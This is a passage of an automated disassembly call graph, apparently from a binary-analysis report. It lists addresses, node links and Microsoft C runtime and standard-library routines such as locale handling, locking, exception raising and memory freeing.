7ff734100ef1 19402->19403 19404 7ff734100ee7 19402->19404 19406 7ff7340f80dc __free_lconv_mon 11 API calls 19403->19406 19405 7ff7340f80dc __free_lconv_mon 11 API calls 19404->19405 19407 7ff734100eef FreeEnvironmentStringsW 19405->19407 19406->19407 19407->19391 19410 7ff7340f4b6d 19409->19410 19411 7ff7340f8064 _Getctype 11 API calls 19410->19411 19423 7ff7340f4ba3 19411->19423 19412 7ff7340f4bab 19413 7ff7340f80dc __free_lconv_mon 11 API calls 19412->19413 19414 7ff7340f4b13 19413->19414 19414->19378 19415 7ff7340f4c1e 19416 7ff7340f80dc __free_lconv_mon 11 API calls 19415->19416 19416->19414 19417 7ff7340f8064 _Getctype 11 API calls 19417->19423 19418 7ff7340f4c0d 19437 7ff7340f4c58 19418->19437 19422 7ff7340f4c43 19425 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19422->19425 19423->19412 19423->19415 19423->19417 19423->19418 19423->19422 19426 7ff7340f80dc __free_lconv_mon 11 API calls 19423->19426 19428 7ff7340f7018 19423->19428 19424 7ff7340f80dc __free_lconv_mon 11 API calls 19424->19412 19427 7ff7340f4c56 19425->19427 19426->19423 19430 7ff7340f7025 19428->19430 19432 7ff7340f702f 19428->19432 19429 7ff7340f3518 memcpy_s 11 API calls 19431 7ff7340f7036 19429->19431 19430->19432 19435 7ff7340f704a 19430->19435 19433 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19431->19433 19432->19429 19434 7ff7340f7042 19433->19434 19434->19423 19435->19434 19436 7ff7340f3518 memcpy_s 11 API calls 19435->19436 19436->19431 19438 7ff7340f4c5d 19437->19438 19439 7ff7340f4c15 19437->19439 19440 7ff7340f4c86 19438->19440 19442 7ff7340f80dc __free_lconv_mon 11 API calls 19438->19442 19439->19424 19441 7ff7340f80dc __free_lconv_mon 11 API calls 19440->19441 19441->19439 19442->19438 19444 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19443->19444 19445 7ff7340d9d09 19444->19445 19445->18611 19447 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19446->19447 19448 7ff7340d9da9 19447->19448 19448->18614 19450 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19449->19450 19451 7ff7340d9e44 19450->19451 19451->18617 19453 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19452->19453 19454 7ff7340d9ef3 19453->19454 19454->18620 19456 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19455->19456 19457 7ff7340d9fac 19456->19457 19457->18623 19459 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19458->19459 19460 7ff7340da044 19459->19460 19460->18626 19462 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19461->19462 19463 7ff7340da0ee 19462->19463 19463->18629 19556 7ff7340f267c GetSystemTimeAsFileTime 19464->19556 19467 7ff7340f24c4 19468 7ff7340f7d04 _Getctype 47 API calls 19467->19468 19469 7ff7340d96b6 19468->19469 19470 7ff7340f2498 19469->19470 19471 7ff7340f7d04 _Getctype 47 API calls 19470->19471 19472 7ff7340d96bb 19471->19472 19473 7ff7340da180 19472->19473 19474 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19473->19474 19475 7ff7340da1e2 19474->19475 19475->18639 19558 7ff7340dbbc0 19476->19558 19479 7ff7340da100 19480 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19479->19480 19481 7ff7340da166 19480->19481 19481->18643 19621 7ff7340e45d0 19482->19621 19484 7ff7340daa9c Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19484->18645 19672 7ff7340e1cc0 19485->19672 19487 7ff7340daa3a Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19487->18647 19688 7ff7340e1a90 19488->19688 19490 7ff7340de4f3 Concurrency::details::WorkQueue::IsStructuredEmpty 19490->18649 19492 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19491->19492 19493 7ff7340da251 19492->19493 19493->18653 19692 7ff7340f24dc 19494->19692 19498 7ff7340dd330 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19497->19498 19499 7ff7340dad30 _Mpunct 49 API calls 19498->19499 19500 7ff7340d9889 19499->19500 19500->18664 19714 7ff7340e1c80 19501->19714 19503 7ff7340da9da Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19503->18667 19505 7ff7340dcec2 Concurrency::details::WorkQueue::IsStructuredEmpty 19504->19505 19718 7ff7340dcf30 19505->19718 19508 7ff7340e5d70 20094 7ff7340de0d0 19508->20094 19510 7ff7340e5d9a 19516 7ff7340e5dac 19510->19516 20098 7ff7340e5560 19510->20098 19511 7ff7340e5490 49 API calls 19512 7ff7340e5e36 19511->19512 20101 7ff7340de920 19512->20101 19515 7ff7340d99d8 19517 7ff7340e2200 19515->19517 19516->19511 20144 7ff7340e2170 19517->20144 19519 7ff7340e2246 19519->18677 19521 7ff7340e5490 49 API calls 19521->19519 19523 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19522->19523 19524 7ff7340da398 19523->19524 19524->18679 19526 7ff7340daaf5 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19525->19526 19527 7ff7340dab32 Concurrency::details::WorkQueue::IsStructuredEmpty 19526->19527 19528 7ff7340e1bf0 _Mpunct 49 API calls 19526->19528 20158 7ff7340dd3b0 19527->20158 19528->19527 19530 7ff7340dab87 19530->18681 19532 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19531->19532 19533 7ff7340da46b 19532->19533 19533->18686 19536 7ff7340da683 _Mpunct 19534->19536 19535 7ff7340de0d0 49 API calls 19542 7ff7340da734 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19535->19542 19536->19535 19537 7ff7340e5490 49 API calls 19538 7ff7340da98d 19537->19538 19539 7ff7340de920 49 API calls 19538->19539 19540 7ff7340d9b67 19539->19540 19544 7ff7340dea80 19540->19544 19541 7ff7340e5560 78 API calls 19543 7ff7340da746 std::ios_base::width Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19541->19543 19542->19541 19542->19543 19543->19537 19545 7ff7340de0d0 49 API calls 19544->19545 19547 7ff7340deaac 19545->19547 19546 7ff7340e5490 49 API calls 19548 7ff7340dec1c 19546->19548 19552 7ff7340deb05 wcstoxq 19547->19552 20162 7ff7340dcb60 19547->20162 19550 7ff7340de920 49 API calls 19548->19550 19551 7ff7340d9b75 19550->19551 19551->18699 19552->19546 20184 7ff7340de3a0 19553->20184 19555 7ff7340df17c std::bad_exception::~bad_exception 19555->18704 19557 7ff7340d1233 19556->19557 19557->19467 19559 7ff7340dbbee Concurrency::details::WorkQueue::IsStructuredEmpty 19558->19559 19564 7ff7340da570 19559->19564 19561 7ff7340dbc6e 19562 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19561->19562 19563 7ff7340d9714 19562->19563 19563->19479 19565 7ff7340da59f Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure ctype 19564->19565 19567 7ff7340da5d9 ctype shared_ptr 19565->19567 19568 7ff7340dad30 19565->19568 19567->19561 19569 7ff7340dad57 _Mpunct 19568->19569 19571 7ff7340dad63 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19569->19571 19574 7ff7340e1bf0 19569->19574 19573 7ff7340dad9a Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct char_traits 19571->19573 19577 7ff7340dac20 19571->19577 19573->19567 19580 7ff7340e67f8 19574->19580 19597 7ff7340dabf0 19577->19597 19585 7ff7340e6630 19580->19585 19584 7ff7340e681a 19593 7ff7340e8560 19585->19593 19587 7ff7340e6664 19588 7ff7340e8618 19587->19588 19589 7ff7340e8637 19588->19589 19590 7ff7340e8682 RaiseException 19589->19590 19591 7ff7340e8660 RtlPcToFileHeader 19589->19591 19590->19584 19592 7ff7340e8678 19591->19592 19592->19590 19594 7ff7340e85b6 __std_exception_destroy 19593->19594 19595 7ff7340e8581 19593->19595 19594->19587 19595->19594 19596 7ff7340f7018 std::exception::exception 47 API calls 19595->19596 19596->19594 19600 7ff7340e1c30 19597->19600 19601 7ff7340e1c48 allocator 19600->19601 19604 7ff7340dabb0 19601->19604 19605 7ff7340dabc4 19604->19605 19606 7ff7340dabd0 19604->19606 19610 7ff7340dac80 19605->19610 19608 7ff7340dabce 19606->19608 19618 7ff7340df840 19606->19618 19608->19573 19611 7ff7340daca3 19610->19611 19612 7ff7340daca8 19610->19612 19613 7ff7340e1950 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 19611->19613 19614 7ff7340df840 _Allocate RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 19612->19614 19613->19612 19616 7ff7340dacb2 19614->19616 19615 7ff7340ee39c _invalid_parameter_noinfo_noreturn 47 API calls 19615->19616 19616->19615 19617 7ff7340dacd2 19616->19617 19617->19608 19619 7ff7340e7648 std::_Facet_Register RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 19618->19619 19620 7ff7340df853 19619->19620 19620->19608 19622 7ff7340e45ed Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19621->19622 19625 7ff7340e43a0 19622->19625 19624 7ff7340e460c 19624->19484 19630 7ff7340df990 19625->19630 19629 7ff7340e4416 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19629->19624 19631 7ff7340df9b3 19630->19631 19632 7ff7340df9ae 19630->19632 19631->19629 19634 7ff7340dc490 19631->19634 19642 7ff7340e1c10 19632->19642 19635 7ff7340dc4d3 _Mpunct 19634->19635 19636 7ff7340e1bf0 _Mpunct 49 API calls 19635->19636 19637 7ff7340dc4e7 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19635->19637 19636->19637 19638 7ff7340dac20 _Mpunct 49 API calls 19637->19638 19640 7ff7340dc545 Concurrency::details::WorkQueue::IsStructuredEmpty 19638->19640 19639 7ff7340dc5f9 _Mpunct 19639->19629 19640->19639 19653 7ff7340dfa00 19640->19653 19645 7ff7340e681c 19642->19645 19650 7ff7340e66f0 19645->19650 19648 7ff7340e8618 std::ios_base::clear 2 API calls 19649 7ff7340e683e 19648->19649 19651 7ff7340e8560 std::exception::exception 47 API calls 19650->19651 19652 7ff7340e6724 19651->19652 19652->19648 19656 7ff7340e2290 19653->19656 19659 7ff7340db1f0 19656->19659 19658 7ff7340dfa2d 19658->19639 19660 7ff7340db209 19659->19660 19661 7ff7340db218 19659->19661 19663 7ff7340df7a0 19660->19663 19661->19658 19664 7ff7340df804 19663->19664 19666 7ff7340df827 19664->19666 19667 7ff7340ee39c 19664->19667 19666->19661 19668 7ff7340ee214 _invalid_parameter_noinfo 47 API calls 19667->19668 19669 7ff7340ee3b5 19668->19669 19670 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19669->19670 19671 7ff7340ee3ca 19670->19671 19673 7ff7340e1cd8 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19672->19673 19676 7ff7340e1d00 19673->19676 19675 7ff7340e1cf2 19675->19487 19677 7ff7340e1dbf 19676->19677 19679 7ff7340e1d3e Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct char_traits 19676->19679 19680 7ff7340dbf20 19677->19680 19679->19675 19681 7ff7340dbf63 _Mpunct 19680->19681 19682 7ff7340e1bf0 _Mpunct 49 API calls 19681->19682 19683 7ff7340dbf77 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19681->19683 19682->19683 19684 7ff7340dac20 _Mpunct 49 API calls 19683->19684 19686 7ff7340dbfd5 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19684->19686 19685 7ff7340dc076 std::ios_base::failure::failure _Mpunct 19685->19679 19686->19685 19687 7ff7340dfa00 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19686->19687 19687->19685 19690 7ff7340e1aad Concurrency::details::WorkQueue::IsStructuredEmpty 19688->19690 19689 7ff7340e1b09 char_traits 19689->19490 19690->19689 19691 7ff7340dfa00 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19690->19691 19691->19689 19713 7ff7340f276c EnterCriticalSection 19692->19713 19694 7ff7340f2508 19695 7ff7340f2510 19694->19695 19698 7ff7340f2533 19694->19698 19696 7ff7340f3518 memcpy_s 11 API calls 19695->19696 19697 7ff7340f2515 19696->19697 19699 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19697->19699 19700 7ff7340f25d0 73 API calls 19698->19700 19708 7ff7340f2521 19699->19708 19703 7ff7340f253b 19700->19703 19701 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 19702 7ff7340d980d 19701->19702 19702->18656 19702->18660 19704 7ff7340f2579 19703->19704 19705 7ff7340f2569 19703->19705 19703->19708 19707 7ff7340f7018 std::exception::exception 47 API calls 19704->19707 19706 7ff7340f3518 memcpy_s 11 API calls 19705->19706 19706->19708 19709 7ff7340f2587 19707->19709 19708->19701 19709->19708 19710 7ff7340f25ba 19709->19710 19711 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19710->19711 19712 7ff7340f25ce 19711->19712 19715 7ff7340e1c9b Concurrency::details::WorkQueue::IsStructuredEmpty 19714->19715 19716 7ff7340e1d00 std::ios_base::failure::failure 49 API calls 19715->19716 19717 7ff7340e1cb1 19716->19717 19717->19503 19719 7ff7340dcf57 Concurrency::details::WorkQueue::IsStructuredEmpty 19718->19719 19728 7ff7340dd060 19719->19728 19725 7ff7340dd021 19726 7ff7340d99ba 19725->19726 19745 7ff7340e5490 19725->19745 19726->19508 19729 7ff7340dd087 19728->19729 19749 7ff7340e41e0 19729->19749 19732 7ff7340dce10 19920 7ff7340dd130 19732->19920 19734 7ff7340dce23 19925 7ff7340e06f0 19734->19925 19736 7ff7340dce41 19737 7ff7340e4870 19736->19737 19738 7ff7340e489b 19737->19738 19744 7ff7340e4897 wcstoxq 19737->19744 19935 7ff7340e7234 19738->19935 19741 7ff7340e06f0 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 47 API calls 19742 7ff7340e48d4 19741->19742 19943 7ff7340dc940 19742->19943 19744->19725 19746 7ff7340e54ac std::ios_base::good 19745->19746 20090 7ff7340e1ff0 19746->20090 19758 7ff7340e0b50 19749->19758 19753 7ff7340e4224 19754 7ff7340e424a 19753->19754 19756 7ff7340e5490 49 API calls 19753->19756 19755 7ff7340dcfa9 19754->19755 19769 7ff7340e70c4 19754->19769 19755->19732 19756->19754 19774 7ff7340e2050 19758->19774 19763 7ff7340e0bec 19765 7ff7340e5c50 19763->19765 19766 7ff7340e5c6c 19765->19766 19849 7ff7340dca50 19766->19849 19768 7ff7340e5c85 wcstoxq ctype 19768->19753 19770 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19769->19770 19771 7ff7340e70dc 19770->19771 19772 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19771->19772 19773 7ff7340e7135 19772->19773 19773->19755 19789 7ff7340e2080 19774->19789 19777 7ff7340e7648 19778 7ff7340e7653 19777->19778 19779 7ff7340e0bd5 19778->19779 19780 7ff7340f4214 std::_Facet_Register 2 API calls 19778->19780 19781 7ff7340e7672 19778->19781 19779->19763 19786 7ff7340de020 19779->19786 19780->19778 19782 7ff7340e767d 19781->19782 19809 7ff7340e67d8 19781->19809 19813 7ff7340e7eb0 19782->19813 19817 7ff7340e6a28 19786->19817 19790 7ff7340e0bcb 19789->19790 19791 7ff7340e20da 19789->19791 19790->19777 19792 7ff7340e8618 std::ios_base::clear 2 API calls 19791->19792 19793 7ff7340e20ef std::make_error_code 19791->19793 19792->19793 19797 7ff7340ddec0 19793->19797 19796 7ff7340e8618 std::ios_base::clear 2 API calls 19796->19790 19800 7ff7340de1e0 19797->19800 19801 7ff7340dd310 _Mpunct 49 API calls 19800->19801 19802 7ff7340de216 19801->19802 19803 7ff7340dd990 std::ios_base::failure::failure 49 API calls 19802->19803 19804 7ff7340de245 19803->19804 19805 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19804->19805 19806 7ff7340de250 19805->19806 19807 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19806->19807 19808 7ff7340ddefd 19807->19808 19808->19796 19810 7ff7340e67e6 std::bad_alloc::bad_alloc 19809->19810 19811 7ff7340e8618 std::ios_base::clear 2 API calls 19810->19811 19812 7ff7340e67f7 19811->19812 19814 7ff7340e7ebe stdext::threads::lock_error::lock_error 19813->19814 19815 7ff7340e8618 std::ios_base::clear 2 API calls 19814->19815 19816 7ff7340e7ecf 19815->19816 19826 7ff7340e6520 19817->19826 19819 7ff7340e6a4a 19825 7ff7340e6a6d __std_exception_destroy BuildCatchObjectHelperInternal 19819->19825 19830 7ff7340e6c20 19819->19830 19822 7ff7340e6a62 19833 7ff7340e6c50 19822->19833 19823 7ff7340de030 19823->19763 19837 7ff7340e6598 19825->19837 19827 7ff7340e652f 19826->19827 19828 7ff7340e6534 19826->19828 19841 7ff7340f27dc 19827->19841 19828->19819 19831 7ff7340e7648 std::_Facet_Register 4 API calls 19830->19831 19832 7ff7340e6c32 std::ios_base::_Init 19831->19832 19832->19822 19834 7ff7340e6c75 19833->19834 19835 7ff7340e6c62 19833->19835 19834->19825 19844 7ff7340e7314 19835->19844 19838 7ff7340e65a3 LeaveCriticalSection 19837->19838 19840 7ff7340e65ac 19837->19840 19840->19823 19842 7ff7340f89a0 std::_Locinfo::_Locinfo_ctor 5 API calls 19841->19842 19843 7ff7340f27e5 EnterCriticalSection 19842->19843 19845 7ff7340e7322 EncodePointer 19844->19845 19846 7ff7340e7349 19844->19846 19845->19834 19847 7ff7340f3bdc BuildCatchObjectHelperInternal 47 API calls 19846->19847 19848 7ff7340e734e 19847->19848 19850 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19849->19850 19851 7ff7340dca65 19850->19851 19863 7ff7340dedc0 19851->19863 19853 7ff7340dca7e std::locale::_Getfacet 19862 7ff7340dcaab 19853->19862 19869 7ff7340dffb0 19853->19869 19854 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19856 7ff7340dcb47 19854->19856 19856->19768 19858 7ff7340dcad4 19883 7ff7340e69e8 19858->19883 19859 7ff7340dcacc 19879 7ff7340e1980 19859->19879 19862->19854 19864 7ff7340dedd4 19863->19864 19865 7ff7340dee12 19863->19865 19866 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19864->19866 19865->19853 19867 7ff7340dede0 19866->19867 19868 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19867->19868 19868->19865 19870 7ff7340dcac6 19869->19870 19871 7ff7340dffd8 19869->19871 19870->19858 19870->19859 19871->19870 19872 7ff7340e7648 std::_Facet_Register 4 API calls 19871->19872 19873 7ff7340dfff4 19872->19873 19878 7ff7340e0047 19873->19878 19886 7ff7340dd860 19873->19886 19878->19870 19898 7ff7340de670 19878->19898 19880 7ff7340e198e std::bad_alloc::bad_alloc 19879->19880 19881 7ff7340e8618 std::ios_base::clear 2 API calls 19880->19881 19882 7ff7340e199f 19881->19882 19882->19862 19884 7ff7340e7648 std::_Facet_Register 4 API calls 19883->19884 19885 7ff7340e69fb 19884->19885 19885->19862 19887 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19886->19887 19888 7ff7340dd87d _Yarn 19887->19888 19889 7ff7340dd903 19888->19889 19890 7ff7340dd8f2 19888->19890 19908 7ff7340e6840 19889->19908 19903 7ff7340e6b98 19890->19903 19916 7ff7340e6c04 19898->19916 19900 7ff7340de683 std::_Locinfo::~_Locinfo 19901 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19900->19901 19902 7ff7340de6f6 19901->19902 19902->19870 19904 7ff7340f2aec std::_Locinfo::_Locinfo_ctor 82 API calls 19903->19904 19905 7ff7340e6bb1 _Yarn 19904->19905 19906 7ff7340f2aec std::_Locinfo::_Locinfo_ctor 82 API calls 19905->19906 19907 7ff7340e6bda 19905->19907 19906->19907 19909 7ff7340e6738 47 API calls 19908->19909 19910 7ff7340e6851 19909->19910 19911 7ff7340e8618 std::ios_base::clear RtlPcToFileHeader RaiseException 19910->19911 19912 7ff7340e6862 19911->19912 19917 7ff7340e6c11 19916->19917 19918 7ff7340e6c18 19916->19918 19919 7ff7340f2aec std::_Locinfo::_Locinfo_ctor 82 API calls 19917->19919 19918->19900 19919->19918 19921 7ff7340e7648 std::_Facet_Register 4 API calls 19920->19921 19922 7ff7340dd1ec 19921->19922 19923 7ff7340de020 std::ios_base::_Init 57 API calls 19922->19923 19924 7ff7340dd203 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19922->19924 19923->19924 19924->19734 19926 7ff7340e070d Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19925->19926 19927 7ff7340e0795 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19926->19927 19929 7ff7340ee5a4 19926->19929 19927->19736 19930 7ff7340ee5ad 19929->19930 19934 7ff7340ee5bd 19929->19934 19931 7ff7340f3518 memcpy_s 11 API calls 19930->19931 19932 7ff7340ee5b2 19931->19932 19933 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19932->19933 19933->19934 19934->19927 19936 7ff7340e727a 19935->19936 19938 7ff7340e48ae 19936->19938 19957 7ff7340f35f4 19936->19957 19938->19741 19938->19744 19944 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19943->19944 19945 7ff7340dc955 19944->19945 19946 7ff7340dedc0 __int64 7 API calls 19945->19946 19947 7ff7340dc96e std::locale::_Getfacet 19946->19947 19956 7ff7340dc99b 19947->19956 20082 7ff7340dfec0 19947->20082 19948 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19950 7ff7340dca37 19948->19950 19950->19744 19952 7ff7340dc9bc 19953 7ff7340e1980 Concurrency::cancel_current_task 2 API calls 19952->19953 19953->19956 19954 7ff7340dc9c4 19955 7ff7340e69e8 std::_Facet_Register 4 API calls 19954->19955 19955->19956 19956->19948 19958 7ff7340f3538 19957->19958 19959 7ff7340f3555 19958->19959 19962 7ff7340f3581 19958->19962 19960 7ff7340f3518 memcpy_s 11 API calls 19959->19960 19961 7ff7340f355a 19960->19961 19963 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19961->19963 19964 7ff7340f3586 19962->19964 19965 7ff7340f3593 19962->19965 19969 7ff7340e72ad 19963->19969 19966 7ff7340f3518 memcpy_s 11 API calls 19964->19966 19992 7ff7340f919c 19965->19992 19966->19969 19969->19938 19976 7ff7340ef5bc 19969->19976 19970 7ff7340f35b4 19999 7ff7340fefe8 19970->19999 19971 7ff7340f35a7 19972 7ff7340f3518 memcpy_s 11 API calls 19971->19972 19972->19969 19974 7ff7340f35c8 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20004 7ff7340ee5f8 LeaveCriticalSection 19974->20004 19977 7ff7340ef5ec 19976->19977 20059 7ff7340ef2b4 19977->20059 19980 7ff7340ef62d 19982 7ff7340e72c8 19980->19982 19983 7ff7340edf90 _vswprintf_s_l 47 API calls 19980->19983 19981 7ff7340edf90 _vswprintf_s_l 47 API calls 19981->19980 19982->19938 19984 7ff7340ee728 19982->19984 19983->19982 19985 7ff7340ee758 19984->19985 20071 7ff7340ee604 19985->20071 19987 7ff7340ee796 19990 7ff7340ee7ab 19987->19990 19991 7ff7340edf90 _vswprintf_s_l 47 API calls 19987->19991 19988 7ff7340ee771 19988->19987 19989 7ff7340edf90 _vswprintf_s_l 47 API calls 19988->19989 19989->19987 19990->19938 19991->19990 20005 7ff7340f276c EnterCriticalSection 19992->20005 19994 7ff7340f91b3 19995 7ff7340f9210 19 API calls 19994->19995 19996 7ff7340f91be 19995->19996 19997 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 19996->19997 19998 7ff7340f359d 19997->19998 19998->19970 19998->19971 20006 7ff7340fed24 19999->20006 20002 7ff7340ff042 20002->19974 20011 7ff7340fed4e 20006->20011 20007 7ff7340f3518 memcpy_s 11 API calls 20008 7ff7340fefc7 20007->20008 20009 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 20008->20009 20010 7ff7340fef0a 20009->20010 20010->20002 20018 7ff734106e74 20010->20018 20011->20011 20016 7ff7340fef01 20011->20016 20021 7ff734105ff4 20011->20021 20013 7ff7340fef62 20014 7ff734105ff4 47 API calls 20013->20014 20013->20016 20015 7ff7340fef83 20014->20015 20015->20016 20017 7ff734105ff4 47 API calls 20015->20017 20016->20007 20016->20010 20017->20016 20036 7ff734106748 20018->20036 20022 7ff734106001 20021->20022 20026 7ff734106037 20021->20026 20024 7ff7340f3518 memcpy_s 11 API calls 20022->20024 20033 7ff734105fa8 20022->20033 20023 7ff734106061 20025 7ff7340f3518 memcpy_s 11 API calls 20023->20025 20027 7ff73410600b 20024->20027 20029 7ff734106066 20025->20029 20026->20023 20030 7ff734106086 20026->20030 20028 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 20027->20028 20031 7ff734106016 20028->20031 20032 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 20029->20032 20034 7ff7340f35fc TranslateName 47 API calls 20030->20034 20035 7ff734106071 20030->20035 20031->20013 20032->20035 20033->20013 20034->20035 20035->20013 20037 7ff73410675f 20036->20037 20038 7ff73410677d 20036->20038 20039 7ff7340f3518 memcpy_s 11 API calls 20037->20039 20038->20037 20041 7ff734106799 20038->20041 20040 7ff734106764 20039->20040 20043 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 20040->20043 20047 7ff734106d58 20041->20047 20045 7ff734106770 20043->20045 20045->20002 20048 7ff7340f35fc TranslateName 47 API calls 20047->20048 20049 7ff734106dab 20048->20049 20050 7ff7340f83e0 LoadLibraryW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 20049->20050 20052 7ff734106dbb 20049->20052 20050->20052 20051 7ff7340f3c4c 14 API calls 20053 7ff734106e13 20051->20053 20052->20051 20054 7ff734106e17 20053->20054 20055 7ff734106ea8 105 API calls 20053->20055 20056 7ff7341067c4 20054->20056 20057 7ff7340f80dc __free_lconv_mon 11 API calls 20054->20057 20055->20054 20056->20045 20058 7ff734101904 LeaveCriticalSection 20056->20058 20057->20056 20060 7ff7340ef31e 20059->20060 20061 7ff7340ef2de 20059->20061 20060->20061 20063 7ff7340ef32a 20060->20063 20062 7ff7340ee2b0 _vswprintf_s_l 47 API calls 20061->20062 20065 7ff7340ef305 20062->20065 20070 7ff7340ee5ec EnterCriticalSection 20063->20070 20065->19980 20065->19981 20072 7ff7340ee61f 20071->20072 20073 7ff7340ee64d 20071->20073 20075 7ff7340ee2b0 _vswprintf_s_l 47 API calls 20072->20075 20074 7ff7340ee63f Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20073->20074 20081 7ff7340ee5ec EnterCriticalSection 20073->20081 20074->19988 20075->20074 20077 7ff7340ee664 20078 7ff7340ee680 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 74 API calls 20077->20078 20079 7ff7340ee670 20078->20079 20080 7ff7340ee5f8 _fread_nolock LeaveCriticalSection 20079->20080 20080->20074 20083 7ff7340dc9b6 20082->20083 20084 7ff7340dfee8 20082->20084 20083->19952 20083->19954 20084->20083 20085 7ff7340e7648 std::_Facet_Register 4 API calls 20084->20085 20086 7ff7340dff04 20085->20086 20087 7ff7340dd860 85 API calls 20086->20087 20089 7ff7340dff2b 20086->20089 20087->20089 20088 7ff7340de670 std::_Locinfo::~_Locinfo 83 API calls 20088->20083 20089->20083 20089->20088 20091 7ff7340e200e 20090->20091 20092 7ff7340e2080 std::ios_base::clear 49 API calls 20091->20092 20093 7ff7340e203e 20092->20093 20093->19726 20095 7ff7340de0ed std::ios_base::good 20094->20095 20097 7ff7340de114 std::ios_base::good 20095->20097 20105 7ff7340e3ec0 20095->20105 20097->19510 20113 7ff7340e6150 20098->20113 20099 7ff7340e558d 20099->19516 20102 7ff7340de92e 20101->20102 20103 7ff7340de960 20102->20103 20140 7ff7340e14d0 20102->20140 20103->19515 20106 7ff7340e3ee8 20105->20106 20107 7ff7340e3f71 20106->20107 20108 7ff7340de0d0 49 API calls 20106->20108 20107->20097 20111 7ff7340e3f04 20108->20111 20109 7ff7340e3f66 20110 7ff7340de920 49 API calls 20109->20110 20110->20107 20111->20109 20112 7ff7340e5490 49 API calls 20111->20112 20112->20109 20114 7ff7340e616f 20113->20114 20116 7ff7340e6188 _Mpunct 20113->20116 20114->20099 20116->20114 20117 7ff7340ef9c8 20116->20117 20118 7ff7340ef9f8 20117->20118 20125 7ff7340ef718 20118->20125 20121 7ff7340efa3c 20123 7ff7340efa51 20121->20123 20124 7ff7340edf90 _vswprintf_s_l 47 API calls 20121->20124 20122 7ff7340edf90 _vswprintf_s_l 47 API calls 20122->20121 20123->20114 20124->20123 20126 7ff7340ef765 20125->20126 20127 7ff7340ef738 20125->20127 20126->20121 20126->20122 20127->20126 20128 7ff7340ef742 20127->20128 20129 7ff7340ef76d 20127->20129 20130 7ff7340ee2b0 _vswprintf_s_l 47 API calls 20128->20130 20132 7ff7340ef658 20129->20132 20130->20126 20139 7ff7340ee5ec EnterCriticalSection 20132->20139 20134 7ff7340ef675 20135 7ff7340ef698 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 76 API calls 20134->20135 20136 7ff7340ef67e 20135->20136 20137 7ff7340ee5f8 _fread_nolock LeaveCriticalSection 20136->20137 20138 7ff7340ef689 20137->20138 20138->20126 20142 7ff7340e14f8 std::ios_base::good 20140->20142 20141 7ff7340e1582 20141->20103 20142->20141 20143 7ff7340e5490 49 API calls 20142->20143 20143->20141 20145 